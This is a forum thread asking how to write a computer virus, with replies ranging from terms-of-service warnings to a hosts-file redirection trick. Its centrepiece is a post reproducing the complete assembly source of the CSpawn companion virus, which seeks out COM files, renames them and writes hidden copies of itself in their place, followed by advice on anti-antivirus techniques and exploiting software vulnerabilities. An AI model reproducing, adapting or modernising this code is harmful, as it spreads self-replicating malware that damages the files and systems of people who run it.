How To Write A Virus ?

Pages: 1, 2, 3, 4
free web hosting

Read Latest Entries..: (Post #36) by wem83m2 on Jul 16 2008, 12:11 AM. (Line Breaks Removed)
QUOTE(xboxrulz @ Jul 16 2008, 02:49 AM) this file looks like it can only work on DOS but not Windows.xboxrulzYes it does, but the point is how it actually works, then you can easily change it to work on windows ..
Read the FIRST post of this Topic. - Express your Opinion! Contribute Knowledge :-).

Free Web Hosting > Computers & Tech > Programming > Programming General > Assembly

How To Write A Virus ?

Bio
I know assembly language a bit. I heard from somewhere that ASM can be used in virus writing. So i would like to read something about the concepts of virus making. Have anyone here already had an experience in this ? smile.gif

Reply

yordan
And I am trying to learn how to prevent people from learning how to create viruses. A lot of problems already arised from people doing mistakes when creating a virus.

Reply

warbird
I don't think you'll get much information here since this is in direct violation with our TOS. I'm not sure but probably the admins will close/delete your post. Please don't do this anymore.

-=jeroen=-

Reply

Bio
QUOTE(warbird @ Dec 31 2005, 05:51 PM)
I don't think you'll get much information here since this is in direct violation with our TOS. I'm not sure but probably the admins will close/delete your post. Please don't do this anymore.

-=jeroen=-
*


Sorry then, i didn't know anything about this rolleyes.gif I came to this forum from russian programming forums. There is a freedom about this. Even CS students write viruses while practising programming. I just want this for education not for destruction wink.gif

Reply

yordan
QUOTE
There is a freedom about this

Freedom, yes. Danger for the whole community, no.

Reply

Jeigh
Yea it can be educational probably, but still you'd probably have better luck looking at forums where virus creation and the more dark side of programming are the common element.
Personally I've yet to program anything even virus-esque... except a couple fork() bombs that I tricked people into using but those were more of a nuisance and non-self replicating then anything haha... biggrin.gif

Reply

pyost
I once wrote I virus, but didn't try to send it to anyone. Just for educational purposes biggrin.gif It was extremelly simple, cause I made it in QBasic, but it did the job. These sorts of "viruses" are easy to make, but the user must be really naive to actually start them.

For example, my so-called virus did the following. When started, it changed a windows file called "hosts". If you put

CODE

256.256.256.256       www.google.com


It will tako you to the mentioned ip address when you type www.google.com in your browser. smile.gif
I put my web site's IP address and some popular search engine's urls. I also made a program that returned everything back to normal.

It is a nice program, but works only with WinXP installed on C: (I hade only the basic programming knowledge).

You see, even with the most simple programming languages you can make something good.

This is not really a virus. Hope I didn't break any rules unsure.gif

 

 

 


Reply

Bio
As i know virus is a program that can copy itself and always stays in memory :-)

Reply

pyost
Ok then, this is just a program that plays with your computer.

On the other hand, think about a program like mine which is always running in the background and does the ip thing with any web site the user goes to. Now that would be nice.

You want to google smth
You go to google
You google it and go to a result
Then you wanna google again
You type www.google.com - and it takes you to a completely different web site!

Nice! smile.gif

Reply

miCRoSCoPiC^eaRthLinG
We'd a similar thread discussing some technical aspects of hacking quite sometime back. I let the thread go on with a minor warning that NO POTENTIALLY HARMFUL information is discussed here. You guys are all responsible people and know where to draw the line. So I won't close the thread but let it go on, like I did before. But any signs of deviating from that thin line - will result in sudden death of this thread tongue.gif

There's a that lot you can discuss about authoring a virus - without bringing in the harmful codes and associated stuff into the discussion.

Reply

Latest Entries

wem83m2
QUOTE(xboxrulz @ Jul 16 2008, 02:49 AM) *
this file looks like it can only work on DOS but not Windows.

xboxrulz


Yes it does, but the point is how it actually works, then you can easily change it to work on windows ..

Reply

xboxrulz
this file looks like it can only work on DOS but not Windows.

xboxrulz

Reply

wem83m2
Here is an example of a primitive virus i got from some book.
Its call the companion virus ,, It changes the name of a *.com file to *.con file ,, then names it self *.com . When it excecutes it searchs for com files in directory to infect , then it starts the original file ( which is now called *.con ) and terminates

The SPAWNR Virus Listing
The following virus can be assembled into a COM file by
MASM, TASM or A86 and executed directly.
;The CSpawn virus is a simple companion virus to illustrate how a companion
;virus works.
;
;© 1994 American Eagle Publications, Inc. All Rights Reserved!
.model tiny
.code
org 0100h
CSpawn:
mov sp,OFFSET FINISH + 100H ;Change top of stack
mov ah,4AH ;DOS resize memory fctn
mov bx,sp
mov cl,4
shr bx,cl
inc bx ;BX=# of para to keep
int 21H
mov bx,2CH ;set up EXEC param block
mov ax,[bx]
mov WORD PTR [PARAM_BLK],ax ;environment segment
mov ax,cs
mov WORD PTR [PARAM_BLK+4],ax ;@ of parameter string
mov WORD PTR [PARAM_BLK+8],ax ;@ of FCB1
mov WORD PTR [PARAM_BLK+12],ax ;@ of FCB2
mov dx,OFFSET REAL_NAME ;prep to EXEC
46 The Giant Black Book of Computer Viruses
mov bx,OFFSET PARAM_BLK
mov ax,4B00H
int 21H ;execute host
cli
mov bx,ax ;save return code here
mov ax,cs ;AX holds code segment
mov ss,ax ;restore stack first
mov sp,(FINISH - CSpawn) + 200H
sti
push bx
mov ds,ax ;Restore data segment
mov es,ax ;Restore extra segment
mov ah,1AH ;DOS set DTA function
mov dx,80H ;put DTA at offset 80H
int 21H
call FIND_FILES ;Find and infect files
pop ax ;AL holds return value
mov ah,4CH ;DOS terminate function
int 21H ;bye-bye
;The following routine searches for COM files and infects them
FIND_FILES:
mov dx,OFFSET COM_MASK ;search for COM files
mov ah,4EH ;DOS find first file function
xor cx,cx ;CX holds all file attributes
FIND_LOOP: int 21H
jc FIND_DONE ;Exit if no files found
call INFECT_FILE ;Infect the file!
mov ah,4FH ;DOS find next file function
jmp FIND_LOOP ;Try finding another file
FIND_DONE: ret ;Return to caller
COM_MASK db ’*.COM’,0 ;COM file search mask
;This routine infects the file specified in the DTA.
INFECT_FILE:
mov si,9EH ;DTA + 1EH
mov di,OFFSET REAL_NAME ;DI points to new name
INF_LOOP: lodsb ;Load a character
stosb ;and save it in buffer
or al,al ;Is it a NULL?
jnz INF_LOOP ;If so then leave the loop
mov WORD PTR [di-2],’N’ ;change name to CON & add 0
mov dx,9EH ;DTA + 1EH
mov di,OFFSET REAL_NAME
mov ah,56H ;rename original file
int 21H
jc INF_EXIT ;if can’t rename, already done
mov ah,3CH ;DOS create file function
mov cx,2 ;set hidden attribute
int 21H
mov bx,ax ;BX holds file handle
mov ah,40H ;DOS write to file function
mov cx,FINISH - CSpawn ;CX holds virus length
mov dx,OFFSET CSpawn ;DX points to CSpawn of virus
int 21H
mov ah,3EH ;DOS close file function
int 21H
INF_EXIT: ret
REAL_NAME db 13 dup (?) ;Name of host to execute
Companion Viruses 47
;DOS EXEC function parameter block
PARAM_BLK DW ? ;environment segment
DD 80H ;@ of command line
DD 5CH ;@ of first FCB
DD 6CH ;@ of second FCB
FINISH:
end CSpawn

Reply

wem83m2
How to write a virus ... interesting

Assuming that you only learned 16xbit assembly using turbo or whatever, on a DOS emulator.

Well first of all u'll have to learn Windows programming, you no longer use inturrups but you use kernel function calls.
Then u'll need to get familiar with a 32xbit assebler such as MASM ( although you could write a virus with C but it wont be as effective as assembly )
There is an excellent tutorial about using MASM here http://win32assembly.online.fr/tutorials.html
You'll also need to study how operating systems work, and how it handles memory, disk space ... and soforth
After that, study how an antivirus works - then you can Search for "Anti-AntiVirus techniques"
Then you'll need to learn about different software vulnurabilities, and how to exploit them, different file formats that your virus will work on ( mainly EXEs and DLLs )
Then you'll want to read about different viral techniques that where used before , boot-sector , memory-residence, device driver viruses .... ect

One last hint ,, search for this name "Mark Ludwig" wink.gif it should get you started.

After you've finished with all that u'll know that there is no use to write a virus as you can do alot more better stuff with what you've learned

A good virus is not the one that causes more damage, but the one that can ruplicate it self without getting caught.

I've heard recently that they are beggining to use viruses to fix some software valnurabilities, the virus would spread from one place to another fixing the security holes.

Reply

iGuest
Well if you do make a virus make sure its only for education..I read that in 2003 there was a virus called slammer and well like 27 milion people couldnt use cell phones because of it..If someones house was on fire and they was out in the country they coulda lost there house or somethin because of not bein able 2 call 000 or 911, or someone coulda been impaled on a object and died because of not being able to call emergency..

Anyway my point is a virus can afect people even that don't have the internet or a pc and in a way people can lose there lifes because it not very likely but it is possible(altho guess if there impaled its not just cause the virus they died)...Plus visus cost people heaps of money...

Reply


Got an Opinion! Express your Views! (no registration):-
Add your Reply/ Opinion/ Views/ Comments/ Suggestion/ Questions/ Queries etc.
Posts with decent grammar & English will be accepted and please refrain from profanities.
For asking a Question, We recommend you to sign-up (for free) so that you can track the topic easily.

Nature of your Post*: Opinion/ Reply/ Comments
Question/Query
Feedback to us.
       
Name   Email
Title/Question*

(Maximum characters: 10,000)
You have characters left.

Pages: 1, 2, 3, 4
Recent Queries:-
  1. how to learn to write a virus - 0.67 hr back. (1)
  2. write virus - 7.47 hr back. (1)
  3. write virus html - 11.48 hr back. (1)
  4. how do you put antivirus on a tc1100 - 12.67 hr back. (1)
  5. how to write simple virsuses in notepad - 13.19 hr back. (1)
  6. how to write virus in c - 13.62 hr back. (1)
  7. virus writing in dos - 17.32 hr back. (1)
  8. how to write virus - 11.45 hr back. (6)
  9. how to write viruses - 5.01 hr back. (2)
  10. how to write a simple virus - 20.06 hr back. (1)
  11. how to write virus programs - 19.64 hr back. (2)
  12. how to write a virus - 1.53 hr back. (19)
  13. write a virus - 26.06 hr back. (1)
  14. write virus program from scratch - 34.04 hr back. (1)
Similar Topics

Keywords : write, virus

  1. Desroying Autoplay Virus
    (9)
  2. Annoying Virus!
    Need help. (5)
    I have this strange virus on my computer and McAfee does not detect it. It does not do anything
    harmful. What it does is that, when I am going around 'my computer' and accessing files I
    get this very annoying message saying "your computer has a major virus. Please click yes to download
    the antivirus". It just pops up when I am in 'my computer' and when I am in 'windows
    explorer'. When I click yes they tell me to buy this antivirus program which I think is
    completely crappy. Even McAfee does not see this bug as a virus as it does nothing harmful ....
  3. Some Weird Virus
    (8)
    A couple of weeks ago I was sent a file over AIM (Instant Messaging Service). Stupidly enough,
    though I didn't know the person I accepted and opened the file. I didn't think there was
    anything malicious about it since my Virus Program scanned it and nothing was found. So I opened it
    and a message soon appeared saying "Your trial of Obsidium is over." I have no idea what Obsidium is
    and I never installed it, so I simply closed the warning box and forgot about it. However, the next
    time I booted up the machine I tried to login and the computer hesitated, the same O....
  4. Undetected Virus.
    (8)
    So, on our network at work we have a virus called "rejoice46.exe", but no anti virus, anti spyware,
    anti anything will pick it up. I googled it, nothing happened.. By standard, we just deleted the
    file, but it comes back and then stops you from entering certain locations of your hard drive.
    Obviously, a reformat will rid the system of it, but in a network of over 200 computers, we
    don't have the time to do this, and reinstall all the programs and data. Any suggestions?
    Because at the moment I'm stumped. It feels as if I just have to sit there and let this thing....
  5. What Anti-virus Software Is Best
    A Poll for the anti-virus guys (0)
    Which anti-virus software is best? Personally, I prefer Norton 360 as a all round package because of
    its looks and the way it gets to grips with things. A bit pricey, though.......
  6. Where Are You From ?
    You told it in the shoutbox, write it here (9)
    OK, I heard a lot of questions and answers on the shoubox, let's put it here. I have been asked
    where I am from, I am near Paris, France. Then I have seen on the shout box the following things :
    Doc.h0llyw00d - US EST phplauto is Rafael from Brazil S/A And you, where are you from ?
    Yordan....
  7. Sandisk Memory Card Write Protection
    watch out for that lock switch (12)
    About a year ago I bought a pocket drive that you put a memory card into and then plug into a usb
    port. I bought a 1gb Sandisk memory card to put into the thing. It was really cool I could put the
    memory card into my camera and took pictures on it and at the same time use it as a flash drive to
    store other computer files. Everything was going fine until one day I plugged it into my pocket
    drive and tried to put a text file onto the card to give to a friend. A message came up "Access
    denied due to write protection". I thought "when did I put write protection on this....
  8. Javascript Help Needed : Alert(z) Works Fine But Document.write Not
    please (2)
    hi all, I am facing problem in my javascript, any kind of help would be apreciated CODE
    function basicFiles(){ //var Z = "";             for (i = 0; i <
    document.Form.regionlist.options.length; i++) {                 var x =
    document.Form.regionlist.options[i].value;                 var y =
    document.Form.regionlist.options[i].text;                 var Z =  "regions" +
    "[" + x + "]" + " = " + y + ", ";
                    alert(Z);             }                   } th....
  9. Making Fake Virus In Vbs
    (0)
    Note: Use this to freak out your friends.lol 1. Open notepad 2. Type this in notepad
    lol=msgbox("Warning virus Found!","Virus Found!") 3. Save it as virus.VBS 4. Enjoy....
  10. Whats The Ascii Code Of Your Name?
    write your name in ASCII code (4)
    This is fun write your name in ASCII code in hex; in uppercase C=43 H=48 R=52 I=49 S=53 T=54 I=49
    A=41 N=4E *Whats your ASCII CODE? Please refer to : http://www.asciitable.com/ ....
  11. Update! Anti Virus For Flashdrive Only (v1.7.0)1315
    (v1.7.0)1315 (4)
    Update!! Anti Virus For Flashdrive only No Setup http://www.skupload.com/cpe17anti.html ....
  12. 5 Steps To Prevent Your Usb From Virus
    help your USB not infected with virus (10)
    You have a USB and I’m sure that you had problem with it more than 1 time. The main reason is
    because of virus. And you will use antivirus software to delete these damn viruses, or might format
    it. But it is said that ‘Prevention is better than cure.’ I’ll show you some
    simples step to prevent your beloved USB from virus /tongue.gif" style="vertical-align:middle"
    emoid=":P" border="0" alt="tongue.gif" /> So how can you know that your USB is infected? When you
    right click your USB, you will see “Autoplay” in Bold in the first line. I....
  13. Best Free Anti-virus Program
    NID UR ADVISE! PLS. HELP (22)
    NID UR ADVISE! PLS. HELP....
  14. Trojan / Virus Problem ,please Help
    might be (hoon) (18)
    I have been infected with atrojan but i can detect it. and i have detected Hoon trojan and deleted
    it ,but the symptoms of the trojan is still on my pcs network " all driver have an autoplay (right
    click by mouse) and it gives my this message by d-click on any driver ************** SYS.EXE
    QUOTE windows cannot find 'sys.exe',make sure you typed the name correctly and then try
    again.to search for a file ,clicl the start botton then clicl search the virus was detected and
    deleted from all drivers: C:\sys.exe D:\sys.exe E:\sys.exe F:\sys....
  15. New Virus? Uglyhuman Msn Virus
    A worm that isn't in the virus definitions yet? (29)
    Have you ever gotten a message from your friends that say something like this: its you on this
    photo http://uglyhuman.net/photo***.php I have received that from at least 3 people. Without
    knowing what it was (and the surprise from the domain name with the message /tongue.gif"
    style="vertical-align:middle" emoid=":P" border="0" alt="tongue.gif" />), I clicked on the link and
    Firefox prompted me to download a file. It was a COM file so I thought that was strange. I rechecked
    the URL it was a PHP web page, so I assumed it was telling me to download the photo, so I open....
  16. Steps To Virus Proof Your Pc
    (3)
    Follow the simple steps to virus proof your pc. 1. Make sure you have a clean boot CD handy at all
    times. Your original operating system installation CD should be bootable, so that will do. 2. If
    your anti-virus has an option of making a bootable CD, take some time off to make one of those. You
    will appreciate the effort if the need ever arises. 3. Use a well-reputed anti-virus software and
    update it daily. 4. Make sure your anti-virus automatically scans any newly inserted discs for
    viruses, especially if you tend to exchange data between your office and home comput....
  17. What Is The Best Anti-virus
    (51)
    Just wondering, what is the best anti-virus software that is out there? Also, is there a place that
    has it for free or a free trial. The only anti-virus software I know are Norton and Macfee (unless
    you count trend, but that waas mandatory for school).....
  18. Difference Between OpenOffice Write And MS Word
    Any differences in feature and saved documents that I should know abou (7)
    Hi... I'm new to Open Office. And i don't rate myself as an advanced user of Microsoft Word.
    Just know enough to write whatever documents that I want to. So the question now is, are there any
    differences in features between the two? Some of you might say this is a redundant question since
    I'm not an advanced user of Microsoft Word in the first place, but hey... I just want to know.
    And how about saved documents in Open Office Write? Can those documents be opened in the intended
    format in Microsoft Word? And lastly, if you have ever encountered any problems wi....
  19. MSN "Thank You For Using" And Sharing
    AN MSN virus ? (17)
    MSN now opens a window where wee see things happening : It starts a frame with with the words Virus
    - (1513 kB) Then it says "scanning C disk" Then "installing" Then "propagating" Then it ends with
    "Thank you for usin' and sharin'" What is that thing ? Is it a fake ? Or is it a ral virus ?
    I must confess I'm a little bit afraid. A goggling made me find a german site saying roughly
    "probably a fake". However, even if it's a fake, it behaves like a trojan because it's a
    program residing on your computer and activated evrytime you open a new window. If....
  20. Besides AVG, What's The Best Free Anti-Virus?
    (16)
    I hate AVG personally, but i havent yet figured out what I want to use for an Anti-virus program. I
    have Anti-vir right now, but I really love to the many different opinions that are given here on
    these forums. I just don't know what would be good. I had Avast for a little bit, it seemed
    pretty good, and I'm not quite sure why I didnt use it again. So what do people think is the
    best free anti-virus (please don't mention AVG)?....
  21. Locally Virus From Indonesia
    (3)
    Does anyone know or better infected and succesfully cleaned the virus called as rontok.bro, it's
    came from Indonesia as well and has made many variant. Please help me I was infected. regards
    /ohmy.gif" style="vertical-align:middle" emoid=":o" border="0" alt="ohmy.gif" />....
  22. Which Virus-protection Program Is The Best?
    (18)
    I personally have only ever used McAffee so i cant really judge, I was just wondering the numbers of
    people who prefer one over the other or can't choose.....
  23. Is Norton The Best Anti-virus?
    (34)
    Hi, I have had Norton for 5 years now and I like it but I wanted to know if it was the best or not.
    I think it's the best but that's just my opinion. What's you opinion? Yacoob....
  24. AOL Instant Messenger Chain Virus
    Has anyone else been hit by this? (12)
    yesterday, i was chatting with a friend and she sent me a link to what looked like a photo file...
    when i opened it, it turned out to be a virus... which in turn, automatically messaged all the
    people online on my buddy list the link and then closed all chat windows..... does anyone know what
    this is? and if so, how do i fix it?....
  25. I'm Looking For A Free Virus Scanner
    spyware and virus protector (27)
    i have began to notice that there is a lot of viruses invading my computer. does anyone KnoW of any
    free but good virus protectors? fixed title and 'KnoW' /wink.gif' border='0'
    style='vertical-align:middle' alt='wink.gif' /> ....
  26. VB.NET: Rotating Label & Angled Text Control
    Write text at any angle with this (8)
    Language: Visual Basic.NET 2003 Description: Standard Windows Form Label control capable of
    rotating its text from -360 to 360 degrees. This control has two reference modes, center and
    quadrant. Sample: In a recent programming endeavor I had the need to have text displayed in the
    vertical position. As usual, what I thought would be a 10 min solution became a 3 day journey. I
    just assumed that the standard windows form label control had a build in property that would
    determine the orientation. Once I looked and Googled for the property I soon found I was out of lu....
  27. How To: Connect, Read, Write, Close A Database
    VB.NET (4)
    Here is a tutoral or a novice programmer. This tutorial assumes you have a basic knoladge of
    databases and VB.NET. It also assumes that you have a MS access database named Testdb.mdb with a
    table called "Table1" that has at least one column called "Col1". You must start with a form with
    one label on it. If you need any help email me at bob3695@gmail.com. The first step is connecting
    to the database. The first thing you must do is add the ADODB reference. To do this in the
    "Project" menu click "Add Reference" then select ADODB from the list and click "Select". The next....
  28. How Do I Create And Write To Files?
    creating, writing, deleting files (4)
    Hi, Can someone please tell me how to create files and write to them in PHP. I just want to create
    a simple file containing text, and then be able to read it or update it. Thanks Alfie....
  29. PHP: Good Comments Make Good Scripts
    Commenting makes scripts easier to write (9)
    So this is a basic programing tool that is too often overlooked. I learn programing by looking at
    other peoples work and figuring out what each command does. Having comments in the code provides me
    with an idea of what the author was thinking while writing that part of the code. Additionally,
    commenting your code allows the code to be modified by others for uses other than what it was
    originally written for. This type of versitility makes the overall value of the script higher.
    Many programmers believe that they should protect their scripts by intentionally making ....
  30. Trainable Anti-spam Filter Script
    Any clues howto write one/get one ? (3)
    Hi all, Does anybody have ideas about writing trainable anti-spam mail filters - that you can
    add onto any web-mail script ? Looking for something written in perl/php that'll allow me to
    just check the checkboxes beside spam mails and click any button (say, "mark as spam") and the
    script studies the mail headers and creates its own list of originating spammer domains/ips & blocks
    out mails from 'em ? Thanks /smile.gif' border='0' style='vertical-align:middle'
    alt='smile.gif' /> ....

    1. Looking for write, virus

*RANDOM STUFF*





*SIMILAR VIDEOS*
Searching Video's for write, virus
Similar
Desroying Autoplay Virus
Annoying Virus! - Need help.
Some Weird Virus
Undetected Virus.
What Anti-virus Software Is Best - A Poll for the anti-virus guys
Where Are You From ? - You told it in the shoutbox, write it here
Sandisk Memory Card Write Protection - watch out for that lock switch
Javascript Help Needed : Alert(z) Works Fine But Document.write Not - please
Making Fake Virus In Vbs
Whats The Ascii Code Of Your Name? - write your name in ASCII code
Update! Anti Virus For Flashdrive Only (v1.7.0)1315 - (v1.7.0)1315
5 Steps To Prevent Your Usb From Virus - help your USB not infected with virus
Best Free Anti-virus Program - NID UR ADVISE! PLS. HELP
Trojan / Virus Problem ,please Help - might be (hoon)
New Virus? Uglyhuman Msn Virus - A worm that isn't in the virus definitions yet?
Steps To Virus Proof Your Pc
What Is The Best Anti-virus
Difference Between OpenOffice Write And MS Word - Any differences in feature and saved documents that I should know abou
MSN "Thank You For Using" And Sharing - AN MSN virus ?
Besides AVG, What's The Best Free Anti-Virus?
Locally Virus From Indonesia
Which Virus-protection Program Is The Best?
Is Norton The Best Anti-virus?
AOL Instant Messenger Chain Virus - Has anyone else been hit by this?
I'm Looking For A Free Virus Scanner - spyware and virus protector
VB.NET: Rotating Label & Angled Text Control - Write text at any angle with this
How To: Connect, Read, Write, Close A Database - VB.NET
How Do I Create And Write To Files? - creating, writing, deleting files
PHP: Good Comments Make Good Scripts - Commenting makes scripts easier to write
Trainable Anti-spam Filter Script - Any clues howto write one/get one ?
advertisement




How To Write A Virus ?



 

 

 

 

ADD REPLY / Got an Opinion! a humble request :-) RAPID SEARCH! Free Hosting [X]
Express your Opinions, Thoughts or Contribute your information that might help someone here.
Ask your Doubts & Queries to get answers.. "Together, We enlight each other!"
Register FREE for AD-FREE forum, Create your own topics, Ask Questions, track topics, setup subscriptions & notifications and Get a Free Website w/ Email and FTP.
500MB Space *No Ads*, CPanel, FTP, PHP, MySQL, EMails - 100% FREE